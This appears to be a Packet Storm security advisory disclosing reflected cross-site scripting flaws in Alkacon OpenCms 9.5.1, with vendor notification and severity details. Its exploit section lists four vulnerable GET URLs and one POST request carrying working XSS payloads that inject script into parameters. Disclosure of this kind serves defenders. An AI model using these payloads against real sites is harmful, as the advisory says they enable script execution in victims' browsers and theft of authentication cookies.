what you don't know can hurt you

Alkacon OpenCms 9.5.1 Cross Site Scripting

Alkacon OpenCms 9.5.1 Cross Site Scripting
Posted Mar 13, 2015
Authored by Rehan Ahmed

Alkacon OpenCms version 9.5.1 suffers from a cross site scripting vulnerability.

tags | exploit, xss
MD5 | 3d084771b1baac89e9f752cbc9edecc2

Alkacon OpenCms 9.5.1 Cross Site Scripting

Change Mirror Download
Product: OpenCms
Vendor: Alkacon Software
Vulnerable Version(s): 9.5.1 and probably prior
Tested Version: 9.5.1
Vendor Notification: Mar 05, 2015 (https://github.com/alkacon/opencms-core/issues/304)
Vendor Patch: Not Yet (No Specific Time-line)
Public Disclosure: Mar 12, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference:
Risk Level: Medium
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Not Yet (https://github.com/alkacon/opencms-core/)
Discovered and Credits: Rehan Ahmed (knight_rehan@hotmail.com)

_______________________________________________________________________________________________________________________
Overview
_______________________________________________________________________________________________________________________

Alkacon OpenCms 9.5.1 or prior versions are prone to a multiple cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
_______________________________________________________________________________________________________________________
Vendor's Description of Application
_______________________________________________________________________________________________________________________

OpenCms from Alkacon Software is a professional, easy to use website content management system. OpenCms helps content managers worldwide to create and maintain beautiful websites fast and efficiently.
The fully browser based user interface features configurable editors for structured content with well defined fields. Alternatively, content can be created using an integrated WYSIWYG editor similar to well known office applications. A sophisticated template engine enforces a site-wide corporate layout and W3C standard compliance for all content.
OpenCms is based on Java and XML technology. It can be deployed in an open source environment (e.g. Linux, Apache, Tomcat, MySQL) as well as on commercial components (e.g. Windows NT, IIS, BEA Weblogic, Oracle).
As true open source software, OpenCms is free of licensing costs.

http://www.opencms.org/en/index.html
_______________________________________________________________________________________________________________________
Vulnerability Details & Exploit
_______________________________________________________________________________________________________________________

Method: GET

/opencms/system/modules/org.opencms.workplace.help/jsptemplates/help_head.jsp?__locale=en&homelink="+onmouseover="javascript:confirm(0);">Click HERE<!--
/opencms/system/workplace/locales/en/help/index.html?buildframe=true&workplaceresource="+onmouseover=confirm(0)//
/opencms/system/workplace/views/admin/admin-main.jsp?root=explorer&menu=no&path=%2Fpublishqueue';</script><script>confirm(0)</script>
/opencms/system/workplace/views/explorer/explorer_files.jsp?mode=explorerview";</script><script>confirm(0)</script>

Method: POST

POST /opencms/system/modules/org.opencms.workplace.help/elements/search.jsp?__locale=en HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://127.0.0.1:8080/opencms/system/modules/org.opencms.workplace.help/jsptemplates/help_head.jsp?__locale=en&homelink=null&workplaceresource=&buildframe=true
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Content-Length: 104

action=search&query=<iframe src=javascript:confirm(0);&index=German+online+help&searchPage=1&query2=1234

_______________________________________________________________________________________________________________________


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    1 Files
  • 2
    Dec 2nd
    16 Files
  • 3
    Dec 3rd
    17 Files
  • 4
    Dec 4th
    23 Files
  • 5
    Dec 5th
    11 Files
  • 6
    Dec 6th
    9 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close